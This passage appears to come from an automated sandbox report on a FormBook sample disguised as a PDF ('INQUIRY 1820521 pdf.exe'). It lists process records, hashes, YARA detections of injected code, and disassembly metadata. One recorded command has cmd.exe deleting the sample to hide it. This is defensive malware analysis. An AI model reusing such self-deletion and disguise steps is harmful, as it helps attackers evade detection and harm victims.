                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low

                                                  Chronological Activities

                                                  Analysis Process: INQUIRY 1820521 pdf.exe PID: 1496 Parent PID: 6928

                                                  General

                                                  Start time:09:42:21
                                                  Start date:12/04/2021
                                                  Path:C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe
                                                  Imagebase:0x1d0000
                                                  File size:859648 bytes
                                                  MD5 hash:DD3AE15E952C239AE6D87C8374B3B460
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low

                                                  Chronological Activities

                                                  Analysis Process: INQUIRY 1820521 pdf.exe PID: 1664 Parent PID: 6928

                                                  General

                                                  Start time:09:42:21
                                                  Start date:12/04/2021
                                                  Path:C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe
                                                  Imagebase:0x940000
                                                  File size:859648 bytes
                                                  MD5 hash:DD3AE15E952C239AE6D87C8374B3B460
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.727064011.00000000013C0000.00000040.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.727064011.00000000013C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.727064011.00000000013C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.725306924.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.725306924.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.725306924.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.727127963.00000000013F0000.00000040.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.727127963.00000000013F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.727127963.00000000013F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:low

                                                  Chronological Activities

                                                  Analysis Process: explorer.exe PID: 3424 Parent PID: 1664

                                                  General

                                                  Start time:09:42:24
                                                  Start date:12/04/2021
                                                  Path:C:\Windows\explorer.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:
                                                  Imagebase:0x7ff6fee60000
                                                  File size:3933184 bytes
                                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Chronological Activities

                                                  Analysis Process: autochk.exe PID: 6816 Parent PID: 3424

                                                  General

                                                  Start time:09:42:40
                                                  Start date:12/04/2021
                                                  Path:C:\Windows\SysWOW64\autochk.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\SysWOW64\autochk.exe
                                                  Imagebase:0xe00000
                                                  File size:871424 bytes
                                                  MD5 hash:34236DB574405291498BCD13D20C42EB
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate

                                                  Chronological Activities

                                                  Analysis Process: ipconfig.exe PID: 6824 Parent PID: 3424

                                                  General

                                                  Start time:09:42:41
                                                  Start date:12/04/2021
                                                  Path:C:\Windows\SysWOW64\ipconfig.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\SysWOW64\ipconfig.exe
                                                  Imagebase:0xb50000
                                                  File size:29184 bytes
                                                  MD5 hash:B0C7423D02A007461C850CD0DFE09318
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.907270065.0000000000A00000.00000040.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.907270065.0000000000A00000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.907270065.0000000000A00000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.907534755.0000000000B20000.00000040.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.907534755.0000000000B20000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.907534755.0000000000B20000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.908039234.0000000002C80000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.908039234.0000000002C80000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.908039234.0000000002C80000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:moderate

                                                  Chronological Activities

                                                  Analysis Process: cmd.exe PID: 6852 Parent PID: 6824

                                                  General

                                                  Start time:09:42:44
                                                  Start date:12/04/2021
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:/c del 'C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe'
                                                  Imagebase:0x11d0000
                                                  File size:232960 bytes
                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Chronological Activities

                                                  Analysis Process: conhost.exe PID: 6860 Parent PID: 6852

                                                  General

                                                  Start time:09:42:45
                                                  Start date:12/04/2021
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff724c50000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Chronological Activities

                                                  Disassembly

                                                  Code Analysis

                                                  Reset < >

                                                    Analysis Process: INQUIRY 1820521 pdf.exe PID: 6928 Parent PID: 6004 INQUIRY 1820521 pdf.exeCOMMON

                                                    Executed Functions

                                                    Function 01592F78, Relevance: 5.4, Strings: 4, Instructions: 387COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.680551747.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 53n>$E)^p$LgBs$NmZ-
                                                    • API String ID: 0-2202960634
                                                    • Opcode ID: ca6c0fa18203311d0a0b34efeb881e09653156394288eecbd2b822c6fc48825e
                                                    • Instruction ID: 216d2d0a5126901332a613fbd204e335c3f087e960fc36858b1b1c4244168a75
                                                    • Opcode Fuzzy Hash: ca6c0fa18203311d0a0b34efeb881e09653156394288eecbd2b822c6fc48825e
                                                    • Instruction Fuzzy Hash: 89F18C70D09246CFCB48CFA6D4854AEFBB2FF89320B24C55AC505AB255D739DA42CF91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01593078, Relevance: 5.3, Strings: 4, Instructions: 302COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.680551747.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 53n>$53n>$E)^p$NmZ-
                                                    • API String ID: 0-3241154366
                                                    • Opcode ID: 9f2be0c3ae417f6ef0591c08239b550f9852e2d9ac9b3a3d62d5c5c7016a89ab
                                                    • Instruction ID: 5c9453cb3becbcf8133f7b705fbb4cbbe0753877c57966e85ba53ca3101fb8bd
                                                    • Opcode Fuzzy Hash: 9f2be0c3ae417f6ef0591c08239b550f9852e2d9ac9b3a3d62d5c5c7016a89ab
                                                    • Instruction Fuzzy Hash: 21D15770E0524ADFCB44CFAAD5858AEFBB2FF89300F15C959C905AB254C734AA42CF95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 05679BC0, Relevance: 4.1, Strings: 3, Instructions: 319COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.684281804.0000000005670000.00000040.00000001.sdmp, Offset: 05670000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID: s0 $s0 $s0
                                                    • API String ID: 0-3407110198
                                                    • Opcode ID: 74fc97dd45b43905ecff15ea4cb67b326e8f5b74ee18e28deb5b4d48d2c72bac
                                                    • Instruction ID: e78e92e90d97d1f7cb9fc0395caf214312abfc93092779deee9028363b96b4f8
                                                    • Opcode Fuzzy Hash: 74fc97dd45b43905ecff15ea4cb67b326e8f5b74ee18e28deb5b4d48d2c72bac
                                                    • Instruction Fuzzy Hash: B5E1E374E1421DCFDB24CFA5D984B9DBBF2BB89300F10946AD41AAB364DB349986CF50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01590F29, Relevance: 2.8, Strings: 2, Instructions: 267COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.680551747.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %R$Oe#
                                                    • API String ID: 0-1074270569
                                                    • Opcode ID: 7dfea37bde4b10a6ca5d5df837c935e10a8c1b6129ee488541bea69f4898d8b6
                                                    • Instruction ID: fe0210f26570b1cb72307ec76b95588ce2ad839e6e3a7f2a2aa7252452581ada
                                                    • Opcode Fuzzy Hash: 7dfea37bde4b10a6ca5d5df837c935e10a8c1b6129ee488541bea69f4898d8b6
                                                    • Instruction Fuzzy Hash: BBB13574E052598FDB08CFA5D8805DDFBF2FF89320F24846AD419AB254D73A9842CF51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01590ED1, Relevance: 2.8, Strings: 2, Instructions: 257COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.680551747.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %R$Oe#
                                                    • API String ID: 0-1074270569
                                                    • Opcode ID: 7a6d7d2ee32db18cbf57c3be778b14083091e8926c49ac00bb11a862e640d19c
                                                    • Instruction ID: b91b6e00b0e236dc6d0bbfd3f2c274fcdb7a9a52bd5d8e868267548efd6a6f13
                                                    • Opcode Fuzzy Hash: 7a6d7d2ee32db18cbf57c3be778b14083091e8926c49ac00bb11a862e640d19c
                                                    • Instruction Fuzzy Hash: 84B12474E052198FDB08CFA9D9805DEFBF2FF89320F24842AD419AB254D7769842CF51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01590F72, Relevance: 2.7, Strings: 2, Instructions: 241COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.680551747.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %R$Oe#
                                                    • API String ID: 0-1074270569
                                                    • Opcode ID: 056e215f266b72d20cef2237665a3f4030d309b6487f0f8a06f710800bec9c3d
                                                    • Instruction ID: 5690b1c4ea583030e874fcc5463910ea267fede4273edd23ba569280205a69e4
                                                    • Opcode Fuzzy Hash: 056e215f266b72d20cef2237665a3f4030d309b6487f0f8a06f710800bec9c3d
                                                    • Instruction Fuzzy Hash: 53A11474E052598FDB08CFA9C9805DEFBF2FF89320F24842AD419AB258D7769846CF51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01590FD0, Relevance: 2.7, Strings: 2, Instructions: 207COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.680551747.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %R$Oe#
                                                    • API String ID: 0-1074270569
                                                    • Opcode ID: e41c4950133cbf11cc7cd3dece0859d939416c116e7c880e7a5c4d769a91cc03
                                                    • Instruction ID: 56c7a6c513f4385a9de6c6f49c60233ff3341ba8b69c9c68ee93e305d7d275b9
                                                    • Opcode Fuzzy Hash: e41c4950133cbf11cc7cd3dece0859d939416c116e7c880e7a5c4d769a91cc03
                                                    • Instruction Fuzzy Hash: 4D910074E002198FCB08CFEAC980ADEFBB2BF88310F20842AD519BB258D7759941CF55
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0159BF30, Relevance: 1.3, Strings: 1, Instructions: 89COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.680551747.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID: tht
                                                    • API String ID: 0-4180597119
                                                    • Opcode ID: 95b9a4df20470db3786896c669b708e853423c1faca41bddb6e5133f1ebc5e95
                                                    • Instruction ID: 8fab48cc281ab58933cb3733535550e611892298d04620f082af0d04a52181bb
                                                    • Opcode Fuzzy Hash: 95b9a4df20470db3786896c669b708e853423c1faca41bddb6e5133f1ebc5e95
                                                    • Instruction Fuzzy Hash: 7B316134E06208EFDB48CFA5E58599DFBB2FFC9300F24D5AA8415AB258D7348701DB15
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0159BF40, Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.680551747.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID: tht
                                                    • API String ID: 0-4180597119
                                                    • Opcode ID: 140ba7a28b25ba6b77ae145cd55ed09655862c9781223059df3c65fb900b5736
                                                    • Instruction ID: 939639c6d3fa6d20541e797dd8553c3132d7e5e890fd074a53a110b1ac1ba0a4
                                                    • Opcode Fuzzy Hash: 140ba7a28b25ba6b77ae145cd55ed09655862c9781223059df3c65fb900b5736
                                                    • Instruction Fuzzy Hash: D6314134E06208EFDB44CFA5E58459DFBF6FBCA300F24D5A98415AB258D7348701DB15
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0159EE68, Relevance: .7, Instructions: 694COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.680551747.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 021c708fac1444c2862ef65efb85fd67459392457a28ebebb372ee3b10edc5aa
                                                    • Instruction ID: 4e6e21d9b9171779c0ab37391039a1b831015821e2ca66793a0e4857210d5299
                                                    • Opcode Fuzzy Hash: 021c708fac1444c2862ef65efb85fd67459392457a28ebebb372ee3b10edc5aa
                                                    • Instruction Fuzzy Hash: 95525D31A0061A8FCF15CF58C880AAEBBB6FF44304F5584AAD91AAF251D774FD85CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 05673794, Relevance: .2, Instructions: 233COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.684281804.0000000005670000.00000040.00000001.sdmp, Offset: 05670000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bbd3fcb00800914c98abd9e65d46bcf001152b7be35bd7df3ff2e60891329093
                                                    • Instruction ID: a5d5bf4402707ce898357ef9397076ebca6c481f2a22ae86955b7c87679ffa9d
                                                    • Opcode Fuzzy Hash: bbd3fcb00800914c98abd9e65d46bcf001152b7be35bd7df3ff2e60891329093
                                                    • Instruction Fuzzy Hash: 1091AD35E0031A9FCB04DFB4D8949DDBBBAFF89304F148619E416AB364EB74A845DB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 056737E7, Relevance: .2, Instructions: 199COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.684281804.0000000005670000.00000040.00000001.sdmp, Offset: 05670000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 81ce1099d3487fba548c6d79f0fe7c9eae01024966f53a171beb53ee459f9eed
                                                    • Instruction ID: 29301b23d654c7c6f01451acdc7a9031bb2a4dd4901f21cb6915fdfb7f55574d
                                                    • Opcode Fuzzy Hash: 81ce1099d3487fba548c6d79f0fe7c9eae01024966f53a171beb53ee459f9eed
                                                    • Instruction Fuzzy Hash: E081AF36E103199FCB04DFB0D8848DDBBBAFF89304B148615E416AB364EB74A985DB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 05673788, Relevance: .2, Instructions: 198COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.684281804.0000000005670000.00000040.00000001.sdmp, Offset: 05670000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7522a2014eb731a6ff4d31c30653380161cd62edcdf2cbb6d64dc74fb6bdddfd
                                                    • Instruction ID: 2fe270be33fd217326d1ea15264cc8396e364f40ab10d053b769612915426928
                                                    • Opcode Fuzzy Hash: 7522a2014eb731a6ff4d31c30653380161cd62edcdf2cbb6d64dc74fb6bdddfd
                                                    • Instruction Fuzzy Hash: C681CF35E103199FCB04CFB0D8848DDBBBAFF89314F148619E416AB364EB74A985DB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01591779, Relevance: .2, Instructions: 152COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.680551747.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3239cc3fe54c687bb2cc2409f677045b5dd03d1d4ca46f6623c14f4190ccbd7a
                                                    • Instruction ID: 99430e6bf7800b64822c50d66494518c8370914907a8c79f0366055585ae3968
                                                    • Opcode Fuzzy Hash: 3239cc3fe54c687bb2cc2409f677045b5dd03d1d4ca46f6623c14f4190ccbd7a
                                                    • Instruction Fuzzy Hash: D7513970E0561A8FDB08CFAAD9806AEFBF2FF89310F14D52AD419BB254D7348A418B55
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01590470, Relevance: .1, Instructions: 85COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.680551747.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0738366e1458a3cfa7429d41cb2f034fcd7a711a19248a4ac027dd8b8e94d4be
                                                    • Instruction ID: f6f5a6fb8ea0f99aaba0677bad7b5e5c50fe41c4ce45edeeffa456c82dbb960b
                                                    • Opcode Fuzzy Hash: 0738366e1458a3cfa7429d41cb2f034fcd7a711a19248a4ac027dd8b8e94d4be
                                                    • Instruction Fuzzy Hash: 4331D671E056188FEB58CFAAD94079EBAF3BFC8204F15C0AAD508AB254DB354A558F12
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01592140, Relevance: .1, Instructions: 74COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.680551747.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7ddfd3df100063b19c12e3899f2ebd8af96e581a4c5beed391f0ed921822f048
                                                    • Instruction ID: ebc3b461336f4ba4c1a7729d0671031ec2a7f6e27c6e5a5880680dca9004c0aa
                                                    • Opcode Fuzzy Hash: 7ddfd3df100063b19c12e3899f2ebd8af96e581a4c5beed391f0ed921822f048
                                                    • Instruction Fuzzy Hash: 40313971E016188FDB18CFAAD9846CEBBB3BFC9310F14C16AD409AA258DB304945CF51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0159C401, Relevance: 6.1, APIs: 4, Instructions: 123threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32 ref: 0159C470
                                                    • GetCurrentThread.KERNEL32 ref: 0159C4AD
                                                    • GetCurrentProcess.KERNEL32 ref: 0159C4EA
                                                    • GetCurrentThreadId.KERNEL32 ref: 0159C543
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.680551747.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false
                                                    Similarity
                                                    • API ID: Current$ProcessThread
                                                    • String ID:
                                                    • API String ID: 2063062207-0
                                                    • Opcode ID: 247736649454967264e7edec409928b49c3d251ec617a6693bb1aa347485fce8
                                                    • Instruction ID: 5da76cffac5017855dbb532473b385ecd3c3c7d4871480370b21432173f2afae
                                                    • Opcode Fuzzy Hash: 247736649454967264e7edec409928b49c3d251ec617a6693bb1aa347485fce8
                                                    • Instruction Fuzzy Hash: 1E5155B49006488FDB14CFAAD949BEEBBF1FF88314F248459E019A7350DB349944CF66
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0159C410, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32 ref: 0159C470
                                                    • GetCurrentThread.KERNEL32 ref: 0159C4AD
                                                    • GetCurrentProcess.KERNEL32 ref: 0159C4EA
                                                    • GetCurrentThreadId.KERNEL32 ref: 0159C543
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.680551747.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false
                                                    Similarity
                                                    • API ID: Current$ProcessThread
                                                    • String ID:
                                                    • API String ID: 2063062207-0
                                                    • Opcode ID: f55c6eccb3df07d09bb6952f6c496b177854d42e5eaca6feaf1c83805185e8a8
                                                    • Instruction ID: 4a3d00a14f36b98559c6a198cf30aa5251e09ff7a77c2253fb444a4176625da4
                                                    • Opcode Fuzzy Hash: f55c6eccb3df07d09bb6952f6c496b177854d42e5eaca6feaf1c83805185e8a8
                                                    • Instruction Fuzzy Hash: 115144B49006488FDB14CFAAD549BEEBBF1FF89314F208459E019A7350DB745984CF66
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 05671500, Relevance: 1.7, APIs: 1, Instructions: 191COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 05671746
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.684281804.0000000005670000.00000040.00000001.sdmp, Offset: 05670000, based on PE: false
                                                    Similarity
                                                    • API ID: HandleModule
                                                    • String ID:
                                                    • API String ID: 4139908857-0
                                                    • Opcode ID: f1b5f4d18ad5ed64919a0fec03920364185bf5e40accc1b69a2aa50319e0d31a
                                                    • Instruction ID: 0e9911c962921edae6bf3cd26c1fc3faaf3dd9927e55af7b50c1d59e7e012ca1
                                                    • Opcode Fuzzy Hash: f1b5f4d18ad5ed64919a0fec03920364185bf5e40accc1b69a2aa50319e0d31a
                                                    • Instruction Fuzzy Hash: 697113B0A00B098FDB64DF2AD14576ABBF1BF89214F008A2ED44AD7B50DB75E845CF91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 056735AC, Relevance: 1.6, APIs: 1, Instructions: 117COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 056736CA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.684281804.0000000005670000.00000040.00000001.sdmp, Offset: 05670000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateWindow
                                                    • String ID:
                                                    • API String ID: 716092398-0
                                                    • Opcode ID: 67d9b0dbb145411f6a801a6c36300fec4a15dc3fb5498f0c889989fd4df14020
                                                    • Instruction ID: 9bc9b4df5dc6d9ef87b1f76256052eb6932fd6bc13698bd2bc35b755a7d1c3dd
                                                    • Opcode Fuzzy Hash: 67d9b0dbb145411f6a801a6c36300fec4a15dc3fb5498f0c889989fd4df14020
                                                    • Instruction Fuzzy Hash: 2951C0B1D103099FDB14CFA9C880ADEBBB5BF48314F64862AE815AB350D7759985CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 056735B8, Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 056736CA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.684281804.0000000005670000.00000040.00000001.sdmp, Offset: 05670000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateWindow
                                                    • String ID:
                                                    • API String ID: 716092398-0
                                                    • Opcode ID: bd49e06d202015d917a59bccc96bbf3663d2b53513b684958183609a97202a3a
                                                    • Instruction ID: 6388a895877ca3ec95b2756d133bbb38f3c06a709f458f6a12fab21690d98c1a
                                                    • Opcode Fuzzy Hash: bd49e06d202015d917a59bccc96bbf3663d2b53513b684958183609a97202a3a
                                                    • Instruction Fuzzy Hash: 9341CFB1D103099FDF14CFAAC884ADEBBB5BF88314F24852AE419AB310D7759985CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 05679076, Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 05679131
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.684281804.0000000005670000.00000040.00000001.sdmp, Offset: 05670000, based on PE: false
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID:
                                                    • API String ID: 2289755597-0
                                                    • Opcode ID: 8128d3528c6e673a07ea595f719e38f936436dd3bfc0aa48edd32b296f839355
                                                    • Instruction ID: 7a620e7f7ece9b86267af7572b005611a6b3cddab5d4cbf2bd5b0ef2b82ae387
                                                    • Opcode Fuzzy Hash: 8128d3528c6e673a07ea595f719e38f936436dd3bfc0aa48edd32b296f839355
                                                    • Instruction Fuzzy Hash: 2641C271C04618CBDB24DFA5C888BDEBBF5BF49304F10806AD409AB651DBB5694ACF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 05673894, Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CallWindowProcW.USER32(?,?,?,?,?), ref: 05676041
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.684281804.0000000005670000.00000040.00000001.sdmp, Offset: 05670000, based on PE: false
                                                    Similarity
                                                    • API ID: CallProcWindow
                                                    • String ID:
                                                    • API String ID: 2714655100-0
                                                    • Opcode ID: 17a90f8e12e0ad23ed067a7a921411b5470d0c34c3a09ffb98560fd0b4e960bc
                                                    • Instruction ID: 74ebc9277de07ab44bbea799be0478f82be4eb1420d5391246779e36dc45487c
                                                    • Opcode Fuzzy Hash: 17a90f8e12e0ad23ed067a7a921411b5470d0c34c3a09ffb98560fd0b4e960bc
                                                    • Instruction Fuzzy Hash: 99415BB4A00609CFCB14CF99C488BAABFF5FF88314F148459E519AB321D775A941CFA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0567845C, Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 05679131
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.684281804.0000000005670000.00000040.00000001.sdmp, Offset: 05670000, based on PE: false
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID:
                                                    • API String ID: 2289755597-0
                                                    • Opcode ID: 8bfe5325250851f0a13579ae398672c88ad8251f8c221d48baff22aa654bdef6
                                                    • Instruction ID: bbf7397c5d6d3a051312e35949cb6867a20cce3b3ba1b70d58fa70f5cc7b11f4
                                                    • Opcode Fuzzy Hash: 8bfe5325250851f0a13579ae398672c88ad8251f8c221d48baff22aa654bdef6
